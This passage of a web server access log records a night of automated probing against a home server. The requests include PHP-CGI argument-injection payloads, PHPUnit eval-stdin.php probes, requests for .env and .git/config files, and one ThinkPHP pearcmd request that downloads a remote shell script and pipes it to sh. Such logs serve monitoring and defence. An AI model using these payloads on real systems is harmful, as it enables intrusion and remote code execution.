91-82-83-208.pool.digikabel.hu "/default.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:19 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:03:03:19 +0000] 400 - GET http localhost "/" [Client 172.235.168.35] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:03:03:19 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:03:03:20 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:03:05:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:03:05:49 +0000] 404 - POST http 91.82.83.208 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[18/Jan/2026:03:07:16 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 14.103.144.36] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:07:23 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 14.103.144.36] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:07:24 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 14.103.144.36] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:07:28 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 14.103.144.36] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:07:28 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 14.103.144.36] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:07:29 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 14.103.144.36] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:07:29 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 14.103.144.36] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:07:40 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 14.103.144.36] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:11:32 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0" "-" +[18/Jan/2026:03:12:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:03:17:01 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 120.48.109.87] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:17:01 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 120.48.109.87] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:17:02 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 120.48.109.87] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:17:05 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 120.48.109.87] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:17:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 120.48.109.87] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:17:07 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 120.48.109.87] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:17:08 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 120.48.109.87] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:17:09 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 120.48.109.87] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:17:28 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 120.48.109.87] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:03:19:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 104.199.46.221] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[18/Jan/2026:03:23:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:03:39:53 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:03:40:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:03:41:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:03:48:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:02:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:02:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:03:34 +0000] 404 - GET http 91.82.83.208 "/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[18/Jan/2026:04:06:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.124.93.107] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:04:13:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:15:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[18/Jan/2026:04:18:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[18/Jan/2026:04:18:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[18/Jan/2026:04:20:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[18/Jan/2026:04:20:19 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 209.38.90.125] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[18/Jan/2026:04:20:20 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 209.38.90.125] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[18/Jan/2026:04:20:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:04:23:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:04:32:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:37:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:47:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:04:51:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:54:31 +0000] 200 - GET http www.profibot.synology.me "/" [Client 100.52.3.146] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-" +[18/Jan/2026:04:56:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:04:57:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 146.190.161.227] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:04:57:59 +0000] 400 - - http localhost "-" [Client 146.190.161.227] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:04:59:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:05:03:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:05:05:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:05:13:51 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:05:17:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.55.246] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:19:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:05:25:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.130.32.245] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Jan/2026:05:28:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:05:40:09 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Jan/2026:05:41:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:05:49:54 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[18/Jan/2026:05:54:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:05:55:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 77.76.172.153] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.4" "-" +[18/Jan/2026:05:55:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:05:57:58 +0000] 404 - GET http 91.82.83.208 "/actuator/health" [Client 135.119.112.180] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:06:16:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:06:16:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.1.108] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:06:17:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:06:34:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:06:35:50 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:06:36:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:06:42:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:06:45:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.180.140.5] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[18/Jan/2026:06:46:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:06:51:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[18/Jan/2026:06:57:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.180.140.110] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[18/Jan/2026:07:02:37 +0000] 404 - GET http 91.82.83.208 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[18/Jan/2026:07:06:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:07:11:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:07:13:57 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 23.224.68.178] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:07:13:58 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 23.224.68.178] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:07:13:58 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:13:58 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 23.224.68.178] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:13:58 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:13:59 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:13:59 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:13:59 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:13:59 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:13:59 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:00 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:00 +0000] 404 - GET http 91.82.83.208 